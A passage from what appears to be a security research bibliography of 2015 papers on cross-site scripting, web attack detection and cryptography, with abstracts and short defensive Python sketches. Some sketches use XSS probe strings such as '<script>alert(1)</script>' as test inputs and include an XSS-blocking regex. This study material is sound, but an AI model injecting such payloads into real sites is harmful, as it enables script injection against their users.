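    s = user_input.lower()
    return [name for name, sig in SIGNATURES.items()
            if lcs_length(s, sig) / len(sig) >= threshold]

print(matches("q=<ScRiPt>alert(1)</script>"))   # ['xss']
```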

 

Khan, N.; Abdullah, J.; Khan, A.S., “Towards Vulnerability Prevention Model for Web Browser Using Interceptor Approach,” in IT in Asia (CITA), 2015 9th International Conference on, vol., no., pp. 1–5, 4–5 Aug. 2015. doi:10.1109/CITA.2015.7349842
Abstract: Cross Site Scripting (XSS) is a popular security vulnerability in modern web applications. XSS attacks are malicious scripts which are embedded by attackers into the source code of a web page to be executed at the client side by browsers. Researchers have proposed many techniques for detection and prevention of XSS, but eliminating XSS still remains a challenge. In this paper the authors propose a web security model for XSS vulnerability prevention for web browsers using an interceptor approach. Several client and server side solutions have been proposed, but they degrade browsing performance and increase configuration overhead. The proposed model is an effective solution with minimal performance overhead, using both client and server side locations in the detection and prevention of XSS.
Keywords: Web sites; client-server systems; online front-ends; security of data; Web applications; Web browser; Web page source code; Web security model; XSS attacks; XSS detection; XSS vulnerability prevention; client-server side location; configuration overheads; cross site scripting; interceptor approach; malicious scripts; security vulnerability; vulnerability prevention model; Browsers; Filtering; HTML; Security; Servers; Uniform resource locators; Web pages; Attack; Hybrid; Interceptor; Prevention; Web Security; XSS (ID#: 16-9187)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7349842&isnumber=7349813

 

Hermerschmidt, L.; Kugelmann, S.; Rumpe, B., “Towards More Security in Data Exchange: Defining Unparsers with Context-Sensitive Encoders for Context-Free Grammars,” in Security and Privacy Workshops (SPW), 2015 IEEE, vol., no., pp. 134–141, 21–22 May 2015. doi:10.1109/SPW.2015.29
Abstract: To exchange complex data structures in distributed systems, documents written in context-free languages are exchanged among communicating parties. Unparsing these documents correctly is as important as parsing them correctly, because errors during unparsing result in injection vulnerabilities such as cross-site scripting (XSS) and SQL injection. Injection attacks are not limited to the web world. Every program that uses input to produce documents in a context-free language may be vulnerable to this class of attack. Even for widely used languages such as HTML and JavaScript, there are few approaches that prevent injection attacks by context-sensitive encoding, and those approaches are tied to the language. Therefore, the aim of this paper is to derive context-sensitive encoders from context-free grammars to provide correct unparsing of maliciously crafted input data for all context-free languages. The presented solution integrates encoder definitions into context-free grammars and provides a generator for context-sensitive encoders and decoders that are used during (un)parsing. This unparsing process results in documents where the input data neither influences the structure of the document nor changes its intended semantics. By defining encoding during language definition, developers who use the language are provided with a clean interface for writing and reading documents written in that language, without the need to care about security-relevant encoding.
Keywords: Internet; context-free grammars; context-free languages; context-sensitive grammars; data structures; electronic data interchange; security of data; HTML; JavaScript; SQL injection; XSS; complex data structures; context-sensitive decoders; context-sensitive encoders; cross-site scripting; data exchange security; distributed systems; injection attack prevention; security-relevant encoding; unparsing process; Context; Decoding; Encoding; Grammar; Libraries; Security; context-sensitive encoder; encoding table; injection vulnerability; unparser (ID#: 16-9188)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163217&isnumber=7163193
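A tiny illustration of context-sensitive encoding, the core idea of the paper: the encoder is selected by the output context rather than applied uniformly. The contexts and encoders below are illustrative stand-ins for the grammar-derived encoders the authors generate:

```python
import html, json

def encode_for(context, value):
    """Select the encoder the output context requires; choosing wrongly is
    exactly the unparsing error that enables injection."""
    if context == "html":
        return html.escape(value)
    if context == "js_string":
        # JSON escaping for a JS string literal; production encoders also
        # escape '<' and '/' to stop '</script>' breakouts.
        return json.dumps(value)[1:-1]
    raise ValueError(f"no encoder defined for context {context!r}")

payload = '"><script>alert(1)</script>'
print(encode_for("html", payload))
print(encode_for("js_string", payload))
```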

 

Mtsweni, J., “Analyzing the Security Posture of South African Websites,” in Information Security for South Africa (ISSA), 2015, vol., no., pp. 1–8, 12–13 Aug. 2015. doi:10.1109/ISSA.2015.7335063
Abstract: Today, public-facing websites are virtually used across all different sectors by different types of organizations for information sharing and conducting core business activities. At the same time, the increasing use of mobile devices in Africa has also propelled the deployment and adoption of web-based applications. However, as the use of websites increases, so are the cyber-attacks. Web-based attacks are prevalent across the globe, and in South Africa an increase in such attacks is being observed. Research studies also suggest that over 80% of the active websites are vulnerable to a myriad of attacks. This paper reports on a study conducted to passively analyze and determine the security posture of over 70 South African websites from different sectors. The security posture of the local websites was thereafter compared against the top ten (10) global websites. The list of the websites was mainly chosen using the Amazon’s Alexa service. The focus of the study was mainly on the security defense mechanisms employed by the chosen websites. This approach was chosen because the client-side security policies, which may give an indication of the security posture of a website, can be analyzed without actively scanning multiple websites. Consequently, relevant web-based vulnerabilities and security countermeasures were selected for the analysis. The results of the study suggest that most of the 70 South African websites analyzed are vulnerable to cross-site scripting, injection vulnerabilities, clickjacking and man-in-middle attacks. Over 67% of the analyzed websites unnecessarily expose server information, approximately 50% of the websites do not protect session cookies, about 30% of the websites use secure communications, in particular for transmitting users’ sensitive information, and some websites use deprecated security policies. From the study, it was also determined that South African websites lag behind in adopting basic security defense mechanisms when compared against top global websites.
Keywords: Web sites; security of data; Amazon Alexa service; South African Web sites; Web-based applications; Web-based attacks; Web-based vulnerabilities; clickjacking attack; client-side security policy; cross-site scripting attack; cyber-attacks; injection vulnerabilities; man-in-middle attack; mobile devices; public-facing Web sites; security countermeasures; security defense mechanisms; security posture; Banking; Education; Government; Security; TV; World Wide Web; cybersecurity; security policies; south africa; web applications; websecurity; websites (ID#: 16-9189)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335063&isnumber=7335039
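A passive check along the lines the study describes can be approximated by fetching one page and inspecting its security headers. A minimal stdlib sketch (the header list is a subset chosen here for illustration; the study's methodology was broader):

```python
from urllib.request import urlopen

# Defense headers the passive analysis looks for (no active scanning).
EXPECTED = [
    "Content-Security-Policy",    # mitigates XSS and injection
    "X-Frame-Options",            # mitigates clickjacking
    "Strict-Transport-Security",  # mitigates man-in-the-middle downgrades
    "X-Content-Type-Options",
]

def posture(url):
    with urlopen(url) as resp:
        return {h: resp.headers.get(h, "MISSING") for h in EXPECTED}

for header, value in posture("https://example.com").items():
    print(f"{header}: {value}")
```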

 

Wazzan, M.A.; Awadh, M.H., “Towards Improving Web Attack Detection: Highlighting the Significant Factors,” in IT Convergence and Security (ICITCS), 2015 5th International Conference on, vol., no., pp. 1–5, 24–27 Aug. 2015. doi:10.1109/ICITCS.2015.7293028
Abstract: Nowadays, with the rapid development of the Internet, use of the Web is increasing, and web applications have become a substantial part of people’s daily life (e.g. E-Government, E-Health and E-Learning), as they permit seamless access to and management of information. The main security concern for e-business is web application security. Web applications have many vulnerabilities such as injection, broken authentication and session management, and cross-site scripting (XSS). Subsequently, web applications have become targets of hackers, and many cyber attacks have begun to emerge in order to block the services of these web applications (denial of service attacks). Developers are not aware of these vulnerabilities and do not have enough time to secure their applications. Therefore, there is a significant need to study and improve attack detection for web applications by determining the most significant factors for detection. To the best of our knowledge, there is no research that summarizes the influential factors in detecting web attacks. In this paper, the author studies state-of-the-art techniques and research related to web attack detection: the author analyses and compares different methods of web attack detection and summarizes the most important factors for web attack detection, independent of the type of vulnerability. At the end, the author gives recommendations for building a framework for web application protection.
Keywords: Internet; computer crime; data protection; Web application protection; Web application security; Web application vulnerabilities; Web attack detection; XSS; broken authentication; cross-site scripting; cyber attack; denial of service attack; e-business; hackers; information access; information management; injection; session management; Buffer overflows; Computer crime; IP networks; Intrusion detection; Monitoring; Uniform resource locators (ID#: 16-9190)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7293028&isnumber=729288

 

Jung-Woo Sohn; Jungwoo Ryoo, “Securing Web Applications with Better “Patches“: An Architectural Approach for Systematic Input Validation with Security Patterns,” in Availability, Reliability and Security (ARES), 2015 10th International Conference on, vol., no., pp. 486–492, 24–27 Aug. 2015. doi:10.1109/ARES.2015.106
Abstract: Some of the most rampant problems in software security originate from improper input validation. This is partly due to ad hoc approaches taken by software developers when dealing with user inputs. Therefore, it is a crucial research question in software security to ask how to effectively apply well-known input validation and sanitization techniques against security attacks exploiting the user input-related weaknesses found in software. This paper examines the current ways in which input validation is conducted in major open-source projects and, through a case study, attempts to confirm that the main source of the problem is these ad hoc responses to input validation-related attacks such as SQL injection and cross-site scripting (XSS) attacks. In addition, we propose a more systematic software security approach by promoting the adoption of proactive, architectural design-based solutions to move away from the current practice of chronic vulnerability-centric and reactive approaches.
Keywords: Internet; security of data; software architecture; SQL injection attack; Web application security; XSS attack; ad hoc approaches; architectural approach; architectural design-based solution; chronic vulnerability-centric approach; cross-site scripting attack; input validation-related attacks; proactive-based solution; reactive approach; sanitization techniques; security patterns; systematic input validation; systematic software security approach; user input-related weaknesses; architectural patterns; improper input validation; intercepting validator; software security (ID#: 16-9191)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299956&isnumber=7299862
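The keywords point to the "intercepting validator" security pattern: one centralized validator placed at the architectural boundary instead of ad hoc per-handler checks. A minimal decorator-based sketch, with a deliberately crude blocklist standing in for a real validation policy:

```python
import functools, re

# One centralized validator applied at the boundary, instead of ad hoc
# checks scattered through every handler.
DISALLOWED = re.compile(r"<script|javascript:|on\w+\s*=", re.I)

def intercepting_validator(handler):
    @functools.wraps(handler)
    def wrapper(params):
        for name, value in params.items():
            if DISALLOWED.search(str(value)):
                raise ValueError(f"rejected request: parameter {name!r} failed validation")
        return handler(params)
    return wrapper

@intercepting_validator
def greet(params):
    return f"Hello, {params['name']}!"

print(greet({"name": "Alice"}))
print(greet({"name": "<script>alert(1)</script>"}))   # raises ValueError
```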

 

Xiaobing Guo; Shuyuan Jin; Yaxing Zhang, “XSS Vulnerability Detection Using Optimized Attack Vector Repertory,” in Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC), 2015 International Conference on, vol., no., pp. 29–36, 17–19 Sept. 2015. doi:10.1109/CyberC.2015.50
Abstract: In order to detect the Cross-Site Script (XSS) vulnerabilities in the web applications, this paper proposes a method of XSS vulnerability detection using optimal attack vector repertory. This method generates an attack vector repertory automatically, optimizes the attack vector repertory using an optimization model, and detects XSS vulnerabilities in web applications dynamically. To optimize the attack vector repertory, an optimization model is built in this paper with a machine learning algorithm, reducing the size of the attack vector repertory and improving the efficiency of XSS vulnerability detection. Based on this method, an XSS vulnerability detector is implemented, which is tested on 50 real-world websites. The testing results show that the detector can detect a total of 848 XSS vulnerabilities effectively in 24 websites.
Keywords: Web sites; learning (artificial intelligence); optimisation; security of data; Web applications; XSS vulnerability detection; cross-site script vulnerability detection; machine learning algorithm; optimal attack vector repertory; optimization model; optimized attack vector repertory; real-world Websites; Grammar; HTML; Optimization; Payloads; Testing; Uniform resource locators; Web servers; XSS; attack vector repertory; dynamic analysis; machine learning; web crawler (ID#: 16-9192)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7307783&isnumber=7307766

 

Yen-Lin Chen; Hahn-Ming Lee; Jeng, A.B.; Te-En Wei, “DroidCIA: A Novel Detection Method of Code Injection Attacks on HTML5-Based Mobile Apps,” in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, no., pp. 1014–1021, 20–22 Aug. 2015. doi:10.1109/Trustcom.2015.477
Abstract: Smartphones have become more and more popular recently. There are many different smartphone systems, such as Android, iOS, etc. Based on HTML5, developers now have a convenient framework to develop cross-platform HTML5-based mobile apps. Unfortunately, HTML5-based apps are also susceptible to cross-site scripting attacks, like most web applications. Attackers can inject malicious scripts from many different injection channels. In this paper, we propose a new way to detect a known malicious script injected by using the HTML5 text box input type along with “document.getElementById('TagID').value”. This new text box injection channel was not detected by other researchers so far because they only analyzed JavaScript APIs, but overlooked HTML files which capture text box input type information. We applied this new method to a vulnerable app set with 8303 cases obtained from Google Play. We detected a total of 351 vulnerable apps with 99% accuracy, which included 347 detected also by other researchers as well as 4 extra vulnerable apps that belonged to this text box injection channel. We also implemented a Code Injection Attack detection tool named DroidCIA that automates the drawing of the JavaScript API call graph and the combination of API with HTML information.
Keywords: Internet; Java; application program interfaces; hypermedia markup languages; mobile computing; smart phones; DroidCIA; Google Play; HTML5 text box injection channel; HTML5-based mobile application; JavaScript API; code injection attack; smart phone; web applications; Data mining; electronic mail; Google; HTML; Mobile communication; Operating systems; Smart phones (ID#: 16-9193)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345385&isnumber=7345233
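The overlooked channel the paper reports, a text box read via document.getElementById(...).value, can be hunted for with a simple scan. A rough regex sketch, not DroidCIA's call-graph analysis:

```python
import re

HTML5_APP = """
<input type="text" id="userMsg">
<script>
  var msg = document.getElementById("userMsg").value;
  document.write(msg);              // value flows into a dangerous sink
</script>
"""

def textbox_injection_candidates(source):
    """Flag text boxes whose values are read via getElementById(...).value,
    the injection channel the paper reports as previously overlooked."""
    boxes = set(re.findall(r'<input[^>]*type="text"[^>]*id="(\w+)"', source))
    reads = set(re.findall(r'getElementById\(["\'](\w+)["\']\)\.value', source))
    return boxes & reads

print(textbox_injection_candidates(HTML5_APP))   # {'userMsg'}
```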

 

Bozic, J.; Wotawa, F., “PURITY: A Planning-based secURITY Testing Tool,” in Software Quality, Reliability and Security - Companion (QRS-C), 2015 IEEE International Conference on, vol., no., pp. 46–55, 3–5 Aug. 2015. doi:10.1109/QRS-C.2015.19
Abstract: Despite sophisticated defense mechanisms, security testing still plays an important role in software engineering. Because of their latency, security flaws in web applications always bear the risk of being exploited sometime in the future. In order to avoid potential damage, appropriate prevention measures should be incorporated in time, and in the best case already during the software development cycle. In this paper, we contribute to this goal and present the PURITY tool for testing web applications. PURITY executes test cases against a given website. It detects whether the website is vulnerable to some of the most common vulnerabilities, i.e., SQL injections and cross-site scripting. The goal is to resemble malicious activity by following typical sequences of actions potentially leading to a vulnerable state. The test execution proceeds automatically. In contrast to other penetration testing tools, PURITY relies on planning. Concrete test cases are obtained from a plan, which in turn is generated from specific initial values and given actions. The latter are intended to mimic actions usually performed by an attacker. In addition, PURITY allows a tester to configure input parameters and to test a website in a manual manner.
Keywords: Internet; Web sites; program testing; security of data; software tools; PURITY; Web application testing; Web applications; Web site testing; defense mechanisms; malicious activity; planning-based security testing tool; prevention measures; security flaws; software development cycle; software engineering; test execution; Concrete; HTML; Java; Planning; Security; Testing; Uniform resource locators; Model-based testing; Testing tool; planning problem; security testing (ID#: 16-9194)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322124&isnumber=7322103
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Cryptography and Data Security 2015

 

 
SoS Logo

Cryptography and Data Security

2015

 

This collection of articles addresses problems in cryptography and data security related to the Science of Security hard problems of metrics, resilience, composability, and human factors. The work cited here was presented in 2015.



Coulibaly, Y.; Al-Kilany, A.A.I.; Latiff, M.S.A.; Rouskas, G.; Mandala, S.; Razzaque, M.A., “Secure Burst Control Packet Scheme for Optical Burst Switching Networks,” in Broadband and Photonics Conference (IBP), 2015 IEEE International, vol., no., pp. 86–91, 23–25 April 2015. doi:10.1109/IBP.2015.7230771
Abstract: Optical networks are the most adequate platform for the transport of ever-increasing bandwidth-hungry applications and services (BwGAS). Additionally, these networks cope with the continuous growth of the number of Internet users. The Optical Burst Switching (OBS) paradigm is expected to be the backbone infrastructure of the near-future all-optical Internet. In OBS, the data burst and a control packet known as the burst header packet (BHP) are sent out of band (i.e., control packets and data bursts are carried by different channels), and the BHP is sent ahead of the data burst to reserve the necessary network resources for the corresponding burst. After the elapse of a predetermined time known as the offset time, the data burst is sent in the hope that the control packet was able to make the necessary reservations. Sending the BHP ahead of the burst exposes the burst to different security challenges, particularly data burst redirection and denial of service attacks. If the BHP is compromised, the corresponding burst will definitely be compromised. Little effort has been dedicated to investigating control packet security issues in OBS. In this paper, we propose and evaluate a solution to address the Data Burst Redirection (DBR) attack in OBS networks. The solution is designed based on the Rivest-Shamir-Adleman (RSA) public-key encryption algorithm. We evaluated the algorithm via computer simulation. Evaluation metrics are burst loss ratio and throughput. The obtained results demonstrate that the proposed algorithm succeeds in protecting the network against DBR attacks, reducing the number of compromised BHPs. In the future, the authors will work on denial of service issues, considering reliability aspects.
Keywords: computer network security; optical burst switching; public key cryptography; telecommunication control; BwGAS; Internet users; Rivest-Shamir-Adleman public-key encryption; backbone infrastructure; bandwidth-hungry applications and services; burst header packet; computer simulation; control packet security; data burst redirection attack; denial of service attacks; optical burst switching networks; secure burst control packet scheme; Computer crime; Optical packet switching; Public key; Receivers; Throughput (ID#: 16-9195)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7230771&isnumber=7230751
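The paper builds its defense on RSA. As one concrete, hedged instantiation using the Python cryptography package, a BHP could be signed by the ingress node and verified by core nodes before resources are reserved (the abstract speaks of RSA public-key encryption; signing is shown here as the authentication flavor of the same primitive, and the header fields are invented):

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# Ingress node key pair; the public key is distributed to core nodes.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

bhp = b"burst-id=42;offset=50us;out-port=3"   # illustrative header fields
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)
signature = private_key.sign(bhp, pss, hashes.SHA256())

# A core node verifies the BHP before reserving resources; a forged or
# altered header fails verification, blocking burst redirection.
public_key.verify(signature, bhp, pss, hashes.SHA256())
print("BHP signature verified")
```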

 

Dworak, J.; Crouch, A., “A Call to Action: Securing IEEE 1687 and the Need for an IEEE Test Security Standard,” in VLSI Test Symposium (VTS), 2015 IEEE 33rd, vol., no., pp. 1–4, 27–29 April 2015. doi:10.1109/VTS.2015.7116256
Abstract: Today’s chips often contain a wealth of embedded instruments, including sensors, hardware monitors, built-in self-test (BIST) engines, etc. They may process sensitive data that requires encryption or obfuscation and may contain encryption keys and ChipIDs. Unfortunately, unauthorized access to internal registers or instruments through test and debug circuitry can turn design for testability (DFT) logic into a backdoor for data theft, reverse engineering, counterfeiting, and denial-of-service attacks. A compromised chip also poses a security threat to any board or system that includes that chip, and boards have their own security issues. We will provide an overview of some chip and board security concerns as they relate to DFT hardware and will briefly review several ways in which the new IEEE 1687 standard can be made more secure. We will then discuss the need for an IEEE Security Standard that can provide solutions and metrics for providing appropriate security matched to the needs of a real world environment.
Keywords: built-in self test; cryptography; design for testability; reverse engineering; BIST; ChipID; DFT hardware; DFT logic; IEEE 1687; IEEE test security standard; built-in self-test; data theft; denial-of-service attacks; design for testability; embedded instruments; encryption keys; hardware monitors; internal registers; Encryption; Instruments; Microprogramming; Ports (Computers); Registers; Standards; DFT; IEEE Standard; IJTAG; JTAG; LSIB; P1687; lock; scan; security; trap (ID#: 16-9196)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116256&isnumber=7116233

 

Banerjee, P.; Chatterjee, T.; DasBit, S., “LoENA: Low-Overhead Encryption Based Node Authentication in WSN,” in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, vol., no., pp. 2126–2132, 10–13 Aug. 2015. doi:10.1109/ICACCI.2015.7275931
Abstract: Nodes in a wireless sensor network (WSN) are susceptible to various attacks, primarily due to their nature of deployment and unguarded communication. Therefore, providing security in such networks is of utmost importance. The main challenge in achieving this is to make the security solution lightweight so that it is feasible to implement in the resource-constrained nodes of a WSN. So far, data authentication has drawn more attention than node authentication in WSNs. A robust security solution for such networks must also facilitate node authentication. In this paper, a low overhead encryption based security solution is proposed for node authentication. The proposed node authentication scheme at the sender side consists of three modules, viz. dynamic key generation, encryption, and embedding of a key hint. Performance of the scheme is primarily analyzed using two suitably chosen parameters: cracking probability and cracking time. This evaluation guides us in fixing the size of the unique id of a node so that the scheme incurs low overhead as well as achieving acceptable robustness. The performance is also compared with a couple of recent works in terms of computation and communication overheads, which confirms our scheme’s supremacy over competing schemes in terms of both metrics.
Keywords: cryptography; probability; wireless sensor networks; LoENA; WSN; cracking probability; cracking time; data authentication; low-overhead encryption based node authentication; wireless sensor network; Authentication; Encryption; Heuristic algorithms; Receivers; Wireless sensor networks; Wireless sensor network; authentication; encryption; sybil attack; tampering (ID#: 16-9197)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275931&isnumber=7275573

 

Salve, V.B.; Ragha, L.; Marathe, N., “AODV Based Secure Routing Algorithm Against Sinkhole Attack in Wirelesses Sensor Networks,” in Electrical, Computer and Communication Technologies (ICECCT), 2015 IEEE International Conference on, vol., no., pp. 1–7, 5–7 March 2015. doi:10.1109/ICECCT.2015.7226170
Abstract: Wireless sensor networks consist of small nodes with sensing, computation, and wireless communication capabilities. These networks are used in many applications in military, ecological, and health-related areas. These applications often include the monitoring of sensitive information; therefore security is important in WSNs. Routing attacks can have a devastating effect on wireless sensor networks and present a major challenge when designing security mechanisms. The sinkhole attack is the most destructive routing attack for these networks, as it enables many other attacks. In this type of attack, the sinkhole node tries to attract data to itself by convincing neighbors through broadcasting fake routing information. This paper presents an AODV based secure routing algorithm based on mobile agents for detecting the malicious node in a sinkhole attack. The algorithm detects the sinkhole node by finding the difference between node sequence numbers using a threshold value. It also shows a performance evaluation of AODV with the enhanced secure routing algorithm and an existing secure routing algorithm through simulations, which confirmed the effectiveness and accuracy of the algorithm, considering throughput, PDR, and packet loss as performance metrics. Simulation is carried out using the NS2 simulator.
Keywords: routing protocols; telecommunication security; wireless sensor networks; AODV based secure routing algorithm; NS2 simulator; destructive routing attack; fake routing information; malicious node detection; mobile agent; packet loss; performance evaluation; performance metrics; security mechanisms;  Cryptography; Mobile agents; Routing; Wireless sensor networks; AODV; Mobile Agent; Sinkhole Attack; Threshold Value; Wireless sensor Networks (ID#: 16-9198)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7226170&isnumber=7225915
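A toy version of the sequence-number test the abstract describes: an advertisement whose destination sequence number exceeds the rest by more than a threshold is flagged. The numbers and threshold below are invented for illustration:

```python
# Route advertisements seen by a node: (advertiser, destination seq number).
adverts = [("n1", 101), ("n2", 103), ("n3", 102), ("mal", 250)]

THRESHOLD = 20   # hypothetical tolerated gap above the others' maximum

def find_sinkhole(adverts, threshold=THRESHOLD):
    suspects = []
    seqs = [s for _, s in adverts]
    for node, seq in adverts:
        others = [s for s in seqs if s != seq]
        if others and seq - max(others) > threshold:
            suspects.append(node)
    return suspects

print(find_sinkhole(adverts))   # ['mal'] -- an implausibly fresh route
```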

 

Ennahbaoui, M.; Idrissi, H.; El Hajji, S., “Secure and Flexible Grid Computing Based Intrusion Detection System Using Mobile Agents and Cryptographic Traces,” in Innovations in Information Technology (IIT), 2015 11th International Conference on, vol., no., pp. 314–319, 1–3 Nov. 2015. doi:10.1109/INNOVATIONS.2015.7381560
Abstract: Grid computing is one of the new and innovative information technologies that attempt to make resource sharing global and easier. Integrated into networked areas, the resources and services in a grid are dynamic and heterogeneous, and they belong to multiple spaced domains, which effectively enables large scale collection, sharing, and diffusion of data. However, grid computing is still a new paradigm that raises many security issues and conflicts in the computing infrastructures where it is integrated. In this paper, we propose an intrusion detection system (IDS) based on the autonomy, intelligence, and independence of mobile agents to record the behaviors and actions on the grid resource nodes to detect malicious intruders. This is achieved through the use of cryptographic traces associated with a chaining mechanism to elaborate hashed statements of the executed agent code, which are then compared to detect intrusions. We have conducted experiments based on three metrics, network load, response time, and detection ability, to evaluate the effectiveness of our proposed IDS.
Keywords: cryptography; grid computing; mobile agents; IDS; chaining mechanism; cryptographic traces; data collection; data diffusion; data sharing; detection ability metric; intrusion detection system; mobile agents; network load metric; resources sharing; response time metric; security issues; Computer architecture; Cryptography; Grid computing; Intrusion detection; Mobile agents; Monitoring (ID#: 16-9199)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381560&isnumber=7381480
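The cryptographic traces with a chaining mechanism can be pictured as a hash chain over the agent's executed actions, which the home platform recomputes and compares. A minimal stdlib sketch (the paper's actual trace format is not given in the abstract):

```python
import hashlib

def chain_trace(actions, seed=b"agent-dispatch"):
    """Hash-chain the statements executed on each grid node, so a host
    cannot rewrite history without breaking every later link."""
    digest = hashlib.sha256(seed).digest()
    trace = []
    for action in actions:
        digest = hashlib.sha256(digest + action.encode()).digest()
        trace.append(digest.hex())
    return trace

executed = ["open /data/set1", "compute checksum", "send result home"]
trace = chain_trace(executed)

# The home platform replays the expected actions; any divergence between
# the recomputed chain and the reported one indicates tampering.
print(trace == chain_trace(executed))                             # True
print(trace == chain_trace(["open /etc/passwd"] + executed[1:]))  # False
```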

 

Jain, M.; Lenka, S.K., “Secret Data Transmission Using Vital Image Steganography over Transposition Cipher,” in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, vol., no., pp. 1026–1029, 8–10 Oct. 2015. doi:10.1109/ICGCIoT.2015.7380614
Abstract: The idea behind this paper is a modality for a secret interface over globalized communication across the world. To accomplish this, two varieties of security mechanism, cryptography and steganography, are applied. At the former stage, encryption is provided to the secret plain text using the Vernam cipher (one-time pad) transposition technique, since the Vernam cipher shows good performance metrics in terms of low CPU running time, unchanged file size after encryption, and a strong avalanche effect compared with other transposition ciphers. At the later stage, the cipher text is transformed into bytes, and each byte is divided into pairs of bits, with a decimal value assigned to each pair; this value, known as the master variable, ranges between 0 and 3. Depending upon the master variable value, the cipher text is added to the carrier image at the Least Significant Bit (LSB) 6th and 7th bit locations, or the 7th and 8th, 7th and 6th, or 8th and 7th bit locations. This shows that the embedding location of the algorithm changes dynamically, depending upon the dynamically changing master variable value. After completion of embedding and sending the stego image to the receiver side, the cipher text is retrieved from the said locations, and then the decryption process to recover the secret plain text is performed using the Vernam cipher transposition algorithm. In this way we provide robust image steganography. Performance analysis is observed using MSE and PSNR values.
Keywords: cryptography; image coding; mean square error methods; steganography; LSB; MSE; PSNR; Vernam cipher transposition algorithms; cipher text; image steganography; least significant bit; secret data transmission; secret plain text; security mechanism; stego image; Ciphers; Heuristic algorithms; MATLAB; Payloads; Performance analysis; Yttrium; Vernam cipher; decryption; embedding; encryption (ID#: 16-9200)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380614&isnumber=7380415
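A compact sketch of the two stages the abstract describes: Vernam (XOR one-time pad) encryption followed by LSB embedding into carrier bytes. The paper varies the embedding bit positions via its master variable; for brevity a fixed bit position is used here:

```python
import os

def vernam(data: bytes, pad: bytes) -> bytes:
    """One-time pad: the same XOR performs encryption and decryption."""
    assert len(pad) >= len(data)
    return bytes(b ^ p for b, p in zip(data, pad))

def embed_lsb(carrier: bytearray, payload: bytes, bit_pos: int = 0):
    """Write payload bits into one low-order bit of each carrier byte.
    (The paper's master variable varies the bit positions; a fixed
    position is used here for brevity.)"""
    for i, byte in enumerate(payload):
        for j in range(8):
            bit = (byte >> (7 - j)) & 1
            k = i * 8 + j
            carrier[k] = (carrier[k] & ~(1 << bit_pos)) | (bit << bit_pos)
    return carrier

secret = b"meet at noon"
pad = os.urandom(len(secret))
cipher = vernam(secret, pad)

image = bytearray(os.urandom(8 * len(cipher)))   # stand-in for pixel bytes
stego = embed_lsb(image, cipher)
print(vernam(cipher, pad))                       # b'meet at noon'
```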

 

Kalaivani, K.; Anjalipriya, V.; Sivakumar, R.; Srimeena, R., “An Efficient Bio-Key Management Scheme for Telemedicine Applications,” in Technological Innovation in ICT for Agriculture and Rural Development (TIAR), 2015 IEEE, vol., no., pp. 122–126, 10–12 July 2015. doi:10.1109/TIAR.2015.7358543
Abstract: Medical sensor networks play a vital role in real-time health care monitoring for telemedicine based applications. Telemedicine provides specialized healthcare consultation to patients in remote locations. We use electronic information and communication technologies to provide and support healthcare when distance separates the participants. In order to ensure the privacy and security of a patient’s critical health information, it is essential to provide an efficient cryptography scheme. This paper presents a novel Mamdani based Bio-Key Management (MBKM) technique, which assures real time health care monitoring without any overhead. We present simulation results to show that the proposed MBKM scheme can achieve greater security in terms of performance metrics such as False Match Rate (FMR), False Non Match Rate (FNMR), and Genuine Acceptance Rate (GAR) than other recent existing approaches.
Keywords: biomedical telemetry; body sensor networks; cryptography; data privacy; electrocardiography; electromyography; health care; medical computing; patient monitoring; telemedicine; FMR; FNMR; GAR; MBKM; Mamdani based biokey management technique; communication technologies; cryptography scheme; electronic information; false match rate; false nonmatch rate; genuine acceptance rate; medical sensor networks; patient critical health information privacy; patient critical health information security; performance metrics; real time health care monitoring; real-time health care monitoring; remote locations; specialized healthcare consultation; telemedicine based applications; Electrocardiography; Magnetic resonance; Medical services; Security; Telemedicine; Yttrium; Healthcare; Key Management; Medical sensor networks; security (ID#: 16-9201)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7358543&isnumber=7358472

 

Baokang Zhao; Ziling Wei; Bo Liu; Jinshu Su; Ilsun You, “Providing Adaptive Quality of Security in Quantum Networks,” in Heterogeneous Networking for Quality, Reliability, Security and Robustness (QSHINE), 2015 11th International Conference on, vol., no., pp. 440–445, 19–20 Aug. 2015. doi: (not provided)
